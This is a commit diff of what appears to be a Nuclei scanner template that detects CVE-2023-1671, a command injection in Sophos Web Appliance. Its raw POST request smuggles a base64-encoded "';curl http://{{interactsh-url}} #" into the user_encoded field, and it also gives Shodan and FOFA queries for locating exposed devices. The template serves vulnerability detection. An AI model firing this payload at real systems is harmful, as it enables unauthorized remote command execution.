added matcher
parent
d9d9909cd0
commit
19d687cbfe
|
@ -15,12 +15,12 @@ info:
|
|||
cve-id: CVE-2023-1671
|
||||
cwe-id: CWE-77
|
||||
metadata:
|
||||
verified: "true"
|
||||
fofa-query: title="Sophos Web Appliance"
|
||||
shodan-query: title:"Sophos Web Appliance"
|
||||
verified: "true"
|
||||
tags: cve,cve2023,rce,sophos
|
||||
|
||||
requests:
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?c=blocked&action=continue HTTP/1.1
|
||||
|
@ -28,10 +28,15 @@ requests:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: curl/7.86.0
|
||||
|
||||
args_reason=filetypewarn&url=1671&filetype=11412&user=15824&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
|
||||
args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: curl"
|
Loading…
Reference in New Issue